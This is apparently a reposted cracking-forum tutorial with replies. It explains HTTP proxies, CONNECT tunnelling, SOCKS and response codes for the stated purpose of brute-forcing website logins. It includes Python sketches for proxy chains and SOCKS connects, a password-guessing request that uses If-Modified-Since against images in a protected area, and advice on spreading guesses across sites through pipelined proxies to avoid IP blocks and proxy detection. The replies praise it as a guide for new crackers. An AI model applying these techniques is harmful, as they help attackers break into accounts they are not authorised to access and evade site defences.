So proxies obviously hide your IP from the remote server because the remote server sees that the request is coming from the proxy server.

But... yes, there is a but... that isn't always the case.

That's because somebody (or somebodies), in their infinite wisdom, thought it would be a nice idea to allow proxies to send, along with the request, an HTTP header field containing your IP address. So your IP is no longer hidden from the remote server. (A common name for such a field is HTTP_X_FORWARDED_FOR.)

Of course, some proxies don't do that, but still stick to a lesser evil. Their desperate urge for notoriety encourages them to tack on a header field showing that the request is being performed by a proxy on behalf of some other computer. So the site knows you are using a proxy - it just doesn't know what your IP is. (A common name for such a field is Via or HTTP_VIA.) Why is this evil? You're not particularly well hidden if everybody knows you're hiding! Very often sites block IPs that send requests with this tag attached - I know one very popular OCR script with an option that, when turned on, blocks all IPs that send Via without HTTP_X_FORWARDED_FOR.


So now we come to a controversial topic...

ProxyJudges and Anonymity!

Whats the right approach? What does level 1 mean? Should I use only level 1? Only Level 1-3? Any Level?

I really don't know and don't care. The proxyjudge script looks to me, as a programmer, as if it was written by somebody on a mix of vodka and hash. And the ratings seem totally subjective - which isn't a good thing.

There can be only two issues as far as a proxy goes
1) Does it reveal your IP to the remote server?
2) Does it reveal to the remote server the fact that the request is from a proxy server?

The first is anonymity (or lack of). The second is notification-of-proxying.

The ideal proxy does neither. The not-so-ideal proxy does only #2 (it admits to proxying but keeps your IP hidden). The rest aren't worth discussing.


So why use a proxyjudge? Because the output of the proxyjudge can be used to figure out the answers to the two questions posed above. That's what programs like Charon and ProxyRama do.

Quote:
"Does any other factor X matter when it comes to proxies? Somebody told me it does!"

Figure out for yourself. Use the logic above. Question the factor. See why it might affect you. And make the decision.

Don't believe the crap which people dish out to you but can't justify. I posted about proxy levels years ago on deny public. GaaMoa has for years been saying pretty much the same thing. A lot of people consider them pretty useless. Yet, to this day, I speak to experienced individuals who swear by them, without having a clue what they swear by. I don't have a clue either (due to the chaotic nature of the script) - I just don't swear by them.

Also... don't blindly believe that program *Y* is the best. I like Charon, ProxyRama, and my own CheckThrough (specific purpose). But I don't swear by them. I remember people who used to swear by (ahem) AATools some time back. I don't see any of them around any more....

Question yourself at every stage, and you will not stick to any single tool or judgement - that's because you will not believe anything blindly; you will know.


CONNECT Proxies/Tunnelling Proxies/SSL Proxies/IRC Proxies

These are all basically very different names for one class of proxy servers...a subset of the entire set of HTTP proxy servers.

Essentially when the good folks over at w3c came up with the HTTP 1.0 specifications, they soon realized the need to extend these specifications.

That's because those specifications did not allow for a new protocol they needed to be able to use from behind proxy servers - the HTTP over SSL/TLS protocol, also called HTTPS.

This protocol was designed to be superbly extensible. So much so that its basic backbone is a direct TCP pipe from client to server, so that every bit of data sent from the client is passed to the server and vice versa.

So the proxy server can perform NO processing on the actual data sent back and forth. It has to forward it in both directions without altering it. That's because, number one, the data is encrypted. Two, if the proxy server alters it in any way, then extending or upgrading the protocol will break it, because the proxy server understands only the older version of the protocol.

Also, they realized that this setup would be a goldmine - now they could allow direct TCP tunnelling through proxies - you could essentially use proxy servers for pseudo-direct TCP connections to any server and port. So now you could telnet through the proxy without worrying about the proxy being able to speak the telnet protocol ! Or do irc, etc.

With this in mind, they created a new HTTP method, CONNECT.

A CONNECT request is sent in the following way :-

CONNECT host:port HTTP/1.1
Header1: blah
Header2: blah

etc.

It really needs practically NO headers. Maybe one for Proxy-Authorization.

What the proxy server does when receiving such a request is

1) Sees if CONNECT is allowed within its configuration. If not, it sends a 403 (Forbidden) or 501 (Method Not Implemented) HTTP response back.

2) If CONNECT is allowed, check if CONNECT to that specific port is allowed. If not, send a 403 Forbidden response back.

3) If all fine so far, try to connect to the host on the given port. If it fails, throw a 503 HTTP error (server down). If it times out throw a 502 or 504 Gateway Timeout.

4) If all is fine and the connection is established, send an HTTP 200 Connection Established, along with an optional HTTP header, to the client
Via: ProxyServerSoftwareBrandName

e.g.
Via: Squid/2.5 (free and cheap advertisement )

5) Now when client sends data, forward it on the connection to that host and port. If the host sends data, forward it to the client on the connection the client made to the proxy server. The proxy does not modify data in any way.

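Here's a client-side sketch of that exchange in Python (the proxy address is invented). After the 200, the socket is a raw pipe to the target port - for HTTPS you then run TLS straight through it:

Code:

# Sketch of a client using the CONNECT method described above.
import socket, ssl

proxy = ("203.0.113.7", 3128)    # hypothetical CONNECT-capable proxy
with socket.create_connection(proxy, timeout=10) as s:
    s.sendall(b"CONNECT www.example.com:443 HTTP/1.1\r\n\r\n")
    status = s.recv(4096).split(b"\r\n", 1)[0]
    if b" 200 " not in status:
        raise RuntimeError(f"proxy refused: {status!r}")
    # Tunnel up: wrap it in TLS and talk to the site directly - the proxy
    # never sees or alters the encrypted bytes.
    ctx = ssl.create_default_context()
    with ctx.wrap_socket(s, server_hostname="www.example.com") as tls:
        tls.sendall(b"GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n")
        print(tls.recv(4096).split(b"\r\n", 1)[0])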

Restricting CONNECT to certain remote ports only
You can restrict at the proxy server, the remote ports that a client is allowed to CONNECT to via the CONNECT command.

Why would you want to do this? For example, lets say you want the proxy to be allowed for HTTPS (email, eCommerce, etc) but not irc or ftp or telnet. Then you'd allow CONNECT to port 443 only (HTTPS).

A common thing to block is P2P too, due to the excess traffic usage. By limiting CONNECT to common ports like 21 (FTP), 23 (telnet), 22 (SSH), 80 (HTTP), 443 (HTTPS), 6667 (IRC), you can allow users to use all the non bandwidth-intensive services they want.


How does CONNECT come into the bruteforcers life?
If you want to bruteforce HTTPS sites with proxies, you need proxies that support CONNECT on port 443. In other words, you need CONNECT-Proxies that support CONNECT to port 443.

CONNECT can also be used to bruteforce HTTP sites. By using a CONNECT to port 80 (if the proxy supports it), you can proceed with your HTTP request as if you were directly connected to the HTTP server. Also, since the proxy server doesn't touch the data, it can't add HTTP headers - so no leak of your IP, and no way for the remote site to check that you are using a proxy! (Short of manually port-scanning the IP of the proxy.)

Why doesn't everybody use these proxies for bruteforcing, then? Simple: they are rarer. Since they allow a LOT more to be done with them, admins often disable CONNECT to keep traffic lower and ensure that users don't abuse them for P2P etc (e.g. IRC at work).

Also, most programs don't support them. Most programs don't even support surfing via the CONNECT method. Proxy chains do tend to use them, but many of those use CONNECT only to reach the last proxy; rather than using CONNECT to go via the last proxy to the server, they use GET at the last proxy (can't comment on ProxyRama).

Proxy Chains are basically established this way:

0) i = 1
1) Connect to proxy #i
2) Issue a CONNECT command to proxy #i + 1:port of proxy #i + 1
3) Wait for the "Connection established response" from proxy #i
4) Now we have a connection which is as good as a direct one to proxy #i + 1
5) Goto Step 2 until we are at the last proxy, and there are no more proxies to be CONNECT-ed to.

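As a sketch, those steps in Python (the proxy list is invented, and response buffering/error handling is kept minimal):

Code:

# The chaining steps above: one CONNECT per hop.
import socket

def chain(proxies, target):
    s = socket.create_connection(proxies[0], timeout=10)   # steps 0-1
    for host, port in proxies[1:] + [target]:              # steps 2-5
        s.sendall(f"CONNECT {host}:{port} HTTP/1.1\r\n\r\n".encode())
        status = s.recv(4096).split(b"\r\n", 1)[0]
        if b" 200 " not in status:   # no "Connection established"
            s.close()
            raise RuntimeError(f"hop {host}:{port} refused: {status!r}")
    return s   # now as good as a direct connection to the target

# tunnel = chain([("203.0.113.7", 3128), ("198.51.100.2", 8080)],
#                ("www.example.com", 80))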

SOCKS proxies

So what are SOCKS proxies?

Well, just as we have Blu-Ray and HD-DVD, we have SOCKS proxies as an alternative to HTTP proxies. In fact, the CONNECT idea was probably stolen from SOCKS.

SOCKS proxies come in 2 flavors - SOCKS 4 and SOCKS 5. We could talk about SOCKS 4a, but it's inconsequential given the limited extent of our discussion.

SOCKS 4 proxies support 2 types of Methods - CONNECT and BIND.
SOCKS 5 proxies support 3 types of Methods - CONNECT, BIND, UDP DELEGATE.

The CONNECT methods here are identical to the HTTP CONNECT method described above, except that the format of the command is a little different (discussed below), and that I have never known a SOCKS proxy server to restrict the ports you can issue a CONNECT to.

The BIND methods are used for something interesting. Let's say you are using IM to send a file to a friend. The problem is, he is firewalled at his ISP, so you can't connect TO his PC. So your IM issues a BIND command, which makes the SOCKS proxy listen on a specific port, e.g. 12718, and send the IM the port it is listening on, plus the IP. Your IM now uses the IM protocol to send that port and IP to your friend's IM client. The friend's IM client connects to that IP and port, and receives the file from there.

UDP delegates are similarly used to allow tunnelling of UDP data in some fashion. That's to allow stuff like streaming video/audio, VoIP (teleph0ny), and gaming.

SOCKS 4 proxies have one crucial drawback. They can't resolve hostnames. So you can only give them IP addresses to CONNECT to.

SOCKS suffers from one pain in the er... neck. It uses a *binary* protocol. So rather than sending readable requests like CONNECT google.com:80 HTTP/1.0, your request will be raw bytes.

Stuff like :-
Byte 1: 04 for SOCKS 4, 05 for SOCKS 5
Byte 2: 01 for CONNECT, 02 for BIND, 03 for UDP delegate
and so on. Ugly and a pain to code.

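Ugly, but compact. A sketch of the SOCKS 4 CONNECT bytes in Python (addresses invented; the 8-byte reply is assumed to arrive in one recv):

Code:

# Sketch of a SOCKS 4 CONNECT. Note the proxy gets an IP, not a hostname
# (the SOCKS 4 drawback mentioned above).
import socket, struct

def socks4_connect(proxy, ip, port):
    s = socket.create_connection(proxy, timeout=10)
    # Byte 1: version (4). Byte 2: command (1 = CONNECT). Then the port and
    # the IPv4 address in network byte order, then a NUL-terminated user id.
    s.sendall(struct.pack("!BBH", 4, 1, port) + socket.inet_aton(ip) + b"\x00")
    _, code, _, _ = struct.unpack("!BBHI", s.recv(8))
    if code != 90:   # 90 = "request granted" in the SOCKS 4 reply
        s.close()
        raise RuntimeError(f"SOCKS proxy refused: code {code}")
    return s   # tunnel established: raw pipe to ip:port

# s = socks4_connect(("203.0.113.7", 1080), "198.51.100.1", 80)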
For a bruteforcer, a SOCKS proxy and a HTTP CONNECT proxy are roughly equivalent, except for the above mentioned differences.

There are also Wingates which are basically very similar to SOCKS proxies but vary a little.

Since many home users install software like WinGate or ComSocks for their SOCKS proxies, with logging turned off by default (used to be the case), SOCKS and Wingate proxies were often sought after for umm, devious and shady activities

A Couple of Free Bonuses

What do you do if an application of yours doesn't support proxies?

You can use it with a SOCKS or HTTP CONNECT proxy! Just use SocksCap (www.socks.permeo.com) or ProxyCap (google that) to force the connections via the SOCKS or HTTP CONNECT proxy (ProxyCap works with both kinds of proxies, SocksCap only with SOCKS proxies). In the HTTP CONNECT proxy case, this works only with the TCP protocol... not UDP. But TCP is used by telnet... NNTP (news)... HTTP... HTTPS... IRC... TS (Remote Desktop)... Kazaa... BitTorrent... DC++... SSH... FTP... blah! Too many to describe. So quite helpful!

What if you have no SOCKS proxy but your app supports only SOCKS proxies?

Simply use a program like
<shameless ad> HE - http://sss.deny.de/he.html </shameless ad>
that converts your app's SOCKS CONNECT requests to HTTP CONNECT requests and sends them to your HTTP CONNECT proxy. There are tons of such programs around, but many of them are needlessly complicated. HE is simple and works quite okay in my experience. I actually wrote it to allow a couple of friends of mine, stuck behind an HTTP CONNECT proxy, to play Warcraft III on Battle.net. They combined it with SocksCap, and did quite okay.


Obviously the above works only with CONNECT, not with the BIND and UDP delegate methods.


So the combination of SocksCap and HE is quite neat if you have a nosy app that doesn't use proxies. Also, with some care, you can use it with a logging proxy to analyse the data sent out by the app - without bothering to go to the extent of packet capturing and reading needlessly overcomplicated dumps.

It also provides you with a nice firewall-type setup, if you can be bothered to extend HE or find a nice HE-like program with monitoring, logging, and filtering capabilities. Firewalls, in my opinion, are far too passive. This is a slightly more active approach.

Oh, one more thing. FTP is a weird exception here. It requires the BIND command if SocksCapped, so it can't be ProxyCapped, and it can't be used with HTTP CONNECT proxies unless the app itself supports them. That's because it uses a needlessly proxy-unfriendly protocol - one of the oldest protocols around. If you want me to discuss that, post a comment.

--------------------------------------------------------------------------------

Responses!

Since we aren't ready to discuss shoes and ships and sealing wax, and cabbages and kings, let's look at HTTP responses.

HTTP Response handling is really a matter of looking at two elements
[x] HTTP Response Code and header
[x] HTTP Response Body (HTML)

and using a little logic (easy enough?)

Case Study: Basic Auth Site
How do you handle responses?

Response Codes

Basically, the 2xx (200, 206, etc) response codes are pretty much an indication that everything's hunky-dory - the site has actually granted you access. You could of course also get them if your proxy restricts access to the URL being used.

The 3xx codes are related to redirections. So essentially we have two options here... depending on our observation and what's possible under the circumstances:
(a) The redirection depends on whether the user/pass tried works
(b) The redirection doesn't depend on whether the user/pass tried works

In case (a), we could probably not follow the redirection (i.e., not load the URL redirected to) and instead use the target URL itself as a keyword to detect success/failure, depending on which of the two leads to that URL.

In case (b), we need to follow that URL. If the URL isn't basic auth protected, that's sadness; we could then simply treat this as a referrer spoof, with the popup URL as the referrer. If the URL is basic auth protected, and is in the same path tree as the original URL, then we just try the same user/pass with that URL and proceed.

The 4xx codes are HTTP server-side error codes. 401 is Unauthorized - our user/pass doesn't work (in some setups, like IIS, 401 can be used to block based on IP too). 403 is Forbidden - some common reasons for this code include the IP of your proxy being blocked from accessing that URL, the site blocking ANY IP from accessing that URL, the username and password you tried being blocked from accessing that URL, etc. Apache provides the .htaccess mechanism to control such access; other web servers provide other mechanisms. Finally, since you can send HTTP responses, including headers, from server-side scripts, it's easy to program, say, a PHP script that spews 403 errors or other codes at your fancy.

404 is basically File Not Found. AD abuses the 404 code as a way to describe the *user/pass didn't work* scenario in its form component... another example of needlessly confusing users. If you had any inclination to work, you'd figure that one out anyway.

405 is Method Not Allowed. Again controlled via .htaccess in Apache. You can allow users to use GET only on some scripts, use only POST on others, etc. You can disable HEAD if you wish. And so on.

407 is a proxy error code (why is it in the 4xx series? Don't ask me!). Proxy Authorization Required. Obvious.


The 5xx codes are proxy / server error codes.

502 and 504 are generally timeout related.
500 is an internal server error (SQL injection, anybody?); 503 is Service Unavailable. Web server end.



Header fields

Not too many header fields one normally worries about.

One example of a header field we worry about is the "Location" field which holds the new url redirected to on a 3xx response code (redirection).

Another is the WWW-Authenticate field, used to tell you the kind of authentication the site uses (apart from basic auth, it could also use NTLM or digest auth for the popup). It also tells you the realm being authenticated for - nothing fancy, just a sentence or word describing what you are logging onto, e.g. "Britney Spears Style Virgin Fan Club Admin Area".


HTML Responses

Go look up a decent guide on HTML tags.

Just remember one thing. We don't worry about how these responses look in a browser. We worry about the source of the HTML, i.e. the text of the response. So for keywords, we can use HTML tags if they are unique enough. Many people don't seem to have a clue about this aspect of things - just as they didn't know that WWWHack could only really handle keywords from the titles of pages when used in form mode.
--------------------------------------------------------------------------------

Why it matters to read docs!

So I thought I'd give you something to chew upon.

Currently we have the HEAD method, which is used most often by HTTP basic auth (popup) bruteforce apps, and which is pretty fast because it only fetches HTTP headers.

Now, obviously, we might want to use the GET method instead, because it enables us to use keyword matching. Also, HEADs are blocked by some servers (which is why GoldenEye has a radio button letting you choose between GET and HEAD - though HEAD is the default).

But using GET means we get a huge amount of data instead of just a compact header. So how do we handle the onerous task of conserving bandwidth (since doing so obviously speeds up the attack)?

An interesting HTTP header field occurred to me some time back when I was thinking about this issue - the If-Modified-Since field.

Basically on a request, you ask for the full body to be sent to you ONLY If it has been Modified Since the time and date you specify.

http://www.httpsniffer.com/http/1425.htm has a formal definition.


However, obviously, this can only be applied to static content, not dynamic content. Scripts will just plain ignore it, since it is something processed by the web server, and the web server knows that script output can change on each execution, and hence can never already be cached on the user's side - so it must be resent each time.

So it doesn't make any sense to use the URL of a script/HTML file (HTML can have PHP embedded in it!) as the URL to bruteforce.

You therefore look for static content.... ahh, pictures! Obviously this requires you to be able to log in to the protected section at least once and look up some jpgs from the site's default template (that's the one thing that won't change very often).

HTTP/1.1 304 Not Modified
Date: Wed, 26 Jan 2005 06:17:17 GMT
Server: Microsoft-IIS/5.0
Connection: close
ETag: "1be840-d02-413911f0"

The above is an example of such a response, based on an If-Modified-Since header in the request. Clearly it's saved me having to download a huge jpg all over again.


Interestingly - most people seem to attack urls with HEAD - they can achieve as good results with GET if they attack URLs like those of images within the protected realm. Combination of speed and legitimate requests (GET vs HEAD).

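To make the trick concrete, a sketch in Python (URL, date and credentials invented):

Code:

# Sketch: request a static jpg inside the protected area with
# If-Modified-Since set, so a correct pass costs a 304 instead of a download.
import base64, socket

auth = base64.b64encode(b"user:candidatepass").decode()
request = (
    "GET /members/template/logo.jpg HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    f"Authorization: Basic {auth}\r\n"
    "If-Modified-Since: Wed, 26 Jan 2005 06:17:17 GMT\r\n"
    "\r\n"
)
with socket.create_connection(("www.example.com", 80), timeout=10) as s:
    s.sendall(request.encode())
    status = s.recv(4096).split(b"\r\n", 1)[0]
# 304 (or 200) => the credentials were accepted; 401 => a miss.
print(status)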

It's a pity this doesn't work with dynamic content. But there are heaps more such little hidden headers and tricks within the HTTP protocol.

For example, pipelining, which allows you to connect to a server, send 20 requests all together, and get the responses one by one. Chunked encoding in the response allows you to separate the responses. MUCH faster than normal connect-wait for response-send another.

But then pipelining + proxies would mean you send multiple requests to a single site from 1 IP, umm, not good. You're going to get blocked.

So we try the innovative and efficient method: simply attack 20 sites at a time. Make 20 requests via pipelining through the proxy, just one per site. Fetch the responses, close the connection.

Why is this a lot faster? Because instead of connecting to the proxy, sending a request, waiting for the response, disconnecting, and repeating 20 times, we make the connection ONCE, send 20 requests, wait far less for the responses than we would in the previous case, disconnect ONCE - done!

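As a sketch in Python (proxy address and site list invented; real code would parse Content-Length/chunked encoding to split the responses properly):

Code:

# Sketch of the one-request-per-site pipelining idea: one connection to the
# proxy, all requests sent in a burst, responses read back in order.
import socket

sites = ["www.example.com", "www.example.org", "www.example.net"]
burst = b""
for i, h in enumerate(sites):
    conn = "close" if i == len(sites) - 1 else "keep-alive"  # last one ends the stream
    burst += (f"GET http://{h}/ HTTP/1.1\r\nHost: {h}\r\n"
              f"Connection: {conn}\r\n\r\n").encode()
with socket.create_connection(("203.0.113.7", 8080), timeout=15) as s:
    s.sendall(burst)                  # all requests up front
    data = b""
    while chunk := s.recv(65536):
        data += chunk
print(data.count(b"HTTP/1."), "status lines seen (crude count)")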
Efficiency and optimization anybody?

Chew on this baby!
_________________
SSS
(version Infinity)
Feel free to edit if I have overlooked any spam, hehe.

04-01-2005, 06:25 AM   #2
sPlico

Is this the complete thing? You could name it the way he named it :)

Excellent text.

04-03-2005, 05:17 AM   #3
MoonDoggy

I'm pretty sure this is all; I just copied the whole page 1 of 1 and then deleted the ending of each post with the other forum's info.

05-03-2005, 02:33 PM   #4
ChIpStIcK

Ultra helpful text.

06-13-2005, 09:42 AM   #5
OneKnight

This is an awesome read.......... EXCELLENT post. I copied it and saved it for studying.

12-31-2005, 09:32 PM   #6
overkill

Great tutorial and thanks for posting it in xisp!

Can't have too many of these lying around; each one seems to provide something special.

08-26-2006, 08:56 AM   #7
chimaira

Sorry for bringing this back up! But I thought it's a very good tutorial for new crackers - not just for Form@, there's also plenty more info to learn in it.

Thanks for posting it on xisp.

09-28-2006, 03:19 AM   #8
thchog

One of my all-time favorite - if not my favorite - most inspiring, insightful, edumakational reads on BF I have encountered to date, and presumably ever....
__________________
In times of rapid change, experience could be your worst enemy.